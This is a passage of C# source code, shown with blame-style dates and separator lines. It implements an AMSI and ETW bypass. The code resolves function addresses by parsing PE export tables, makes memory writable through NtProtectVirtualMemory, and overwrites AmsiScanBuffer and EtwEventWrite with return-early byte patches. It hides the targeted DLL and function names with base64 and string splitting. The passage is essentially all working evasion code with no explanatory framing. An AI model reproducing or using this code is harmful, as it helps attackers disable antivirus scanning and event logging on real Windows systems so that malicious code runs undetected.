return FunctionPtr;
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
|
|
|
|
|
if (pFunction == IntPtr.Zero)
|
|
|
|
|
{
|
|
|
|
|
throw new InvalidOperationException("Could not get the handle for the function.");
|
|
|
|
|
}
|
|
|
|
|
return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
private static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
|
|
|
|
|
{
|
|
|
|
|
Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
|
|
|
|
|
return funcDelegate.DynamicInvoke(Parameters);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
public static bool NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
|
|
|
|
|
{
|
|
|
|
|
// Craft an array for the arguments
|
|
|
|
|
OldProtect = 0;
|
|
|
|
|
object[] funcargs = { ProcessHandle, BaseAddress, RegionSize, NewProtect, OldProtect };
|
|
|
|
|
|
|
|
|
|
NTSTATUS retValue = (NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref funcargs);
|
|
|
|
|
if (retValue != NTSTATUS.Success)
|
|
|
|
|
{
|
|
|
|
|
return false;
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
OldProtect = (UInt32)funcargs[4];
|
|
|
|
|
return true;
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
|
|
|
|
}
|
2021-07-05 08:22:37 -07:00
|
|
|
|
public class A
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-04-06 20:48:50 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
static byte[] x64_etw_patch = new byte[] { 0x48, 0x33, 0xC0, 0xC3 };
|
|
|
|
|
static byte[] x86_etw_patch = new byte[] { 0x33, 0xc0, 0xc2, 0x14, 0x00 };
|
|
|
|
|
static byte[] x64_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
|
|
|
|
static byte[] x86_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
|
2021-04-06 20:48:50 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Thx D/Invoke!
|
|
|
|
|
private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
|
|
|
|
|
{
|
|
|
|
|
IntPtr FunctionPtr = IntPtr.Zero;
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
// Traverse the PE header in memory
|
|
|
|
|
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
|
|
|
|
|
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
|
|
|
|
|
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
|
|
|
|
|
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
|
|
|
|
|
Int64 pExport = 0;
|
|
|
|
|
if (Magic == 0x010b)
|
|
|
|
|
{
|
|
|
|
|
pExport = OptHeader + 0x60;
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
pExport = OptHeader + 0x70;
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Read -> IMAGE_EXPORT_DIRECTORY
|
|
|
|
|
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
|
|
|
|
|
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
|
|
|
|
|
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
|
|
|
|
|
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
|
|
|
|
|
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
|
|
|
|
|
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
|
|
|
|
|
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Loop the array of export name RVA's
|
|
|
|
|
for (int i = 0; i < NumberOfNames; i++)
|
|
|
|
|
{
|
|
|
|
|
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
|
|
|
|
|
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
|
|
|
|
|
{
|
|
|
|
|
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
|
|
|
|
|
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
|
|
|
|
|
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
catch
|
|
|
|
|
{
|
|
|
|
|
// Catch parser failure
|
|
|
|
|
throw new InvalidOperationException("Failed to parse module exports.");
|
|
|
|
|
}
|
2021-04-06 20:48:50 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
if (FunctionPtr == IntPtr.Zero)
|
|
|
|
|
{
|
|
|
|
|
// Export not found
|
|
|
|
|
throw new MissingMethodException(ExportName + " not found.");
|
|
|
|
|
}
|
|
|
|
|
return FunctionPtr;
|
|
|
|
|
}
|
2021-04-06 20:48:50 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
private static string decode(string b64encoded)
|
2021-04-06 20:48:50 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
return System.Text.ASCIIEncoding.ASCII.GetString(System.Convert.FromBase64String(b64encoded));
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static void PatchMem(byte[] patch, string library, string function)
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
IntPtr CurrentProcessHandle = new IntPtr(-1); // pseudo-handle for current process handle
|
|
|
|
|
IntPtr libPtr = (Process.GetCurrentProcess().Modules.Cast<ProcessModule>().Where(x => library.Equals(Path.GetFileName(x.FileName), StringComparison.OrdinalIgnoreCase)).FirstOrDefault().BaseAddress);
|
|
|
|
|
IntPtr funcPtr = GetExportAddress(libPtr, function);
|
|
|
|
|
IntPtr patchLength = new IntPtr(patch.Length);
|
|
|
|
|
UInt32 oldProtect = 0;
|
|
|
|
|
DInvokeCore.NtProtectVirtualMemory(CurrentProcessHandle, ref funcPtr, ref patchLength, 0x40, ref oldProtect);
|
|
|
|
|
Marshal.Copy(patch, 0, funcPtr, patch.Length);
|
|
|
|
|
}
|
|
|
|
|
catch (Exception e)
|
|
|
|
|
{
|
|
|
|
|
Console.WriteLine(" [!] {0}", e.Message);
|
|
|
|
|
Console.WriteLine(" [!] {0}", e.InnerException);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static void Patcham_si(byte[] patch)
|
|
|
|
|
{
|
|
|
|
|
string dll = decode("YW1zaS5kbGw=");
|
|
|
|
|
foreach (ProcessModule CurrentModule in (Process.GetCurrentProcess().Modules))
|
|
|
|
|
{
|
|
|
|
|
if (CurrentModule.ModuleName == dll)
|
|
|
|
|
{
|
|
|
|
|
PatchMem(patch, dll, ("Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"));
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static void PatchETW(byte[] Patch)
|
|
|
|
|
{
|
|
|
|
|
PatchMem(Patch, ("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"), ("Et" + "wE" + "ve" + "nt" + "Wr" + "it" + "e"));
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
public static void B()
|
|
|
|
|
{
|
|
|
|
|
bool isit64bit;
|
|
|
|
|
if (IntPtr.Size == 4)
|
|
|
|
|
{
|
|
|
|
|
isit64bit = false;
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
isit64bit = true;
|
|
|
|
|
}
|
|
|
|
|
if (isit64bit)
|
|
|
|
|
{
|
|
|
|
|
Patcham_si(x64_am_si_patch);
|
|
|
|
|
PatchETW(x64_etw_patch);
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
Patcham_si(x86_am_si_patch);
|
|
|
|
|
PatchETW(x86_etw_patch);
|
|
|
|
|
}
|
2021-04-06 20:48:50 -07:00
|
|
|
|
}
|
2021-04-02 09:27:13 -07:00
|
|
|
|
}
|
2021-07-05 08:22:37 -07:00
|
|
|
|
|
2021-04-02 09:27:13 -07:00
|
|
|
|
}
|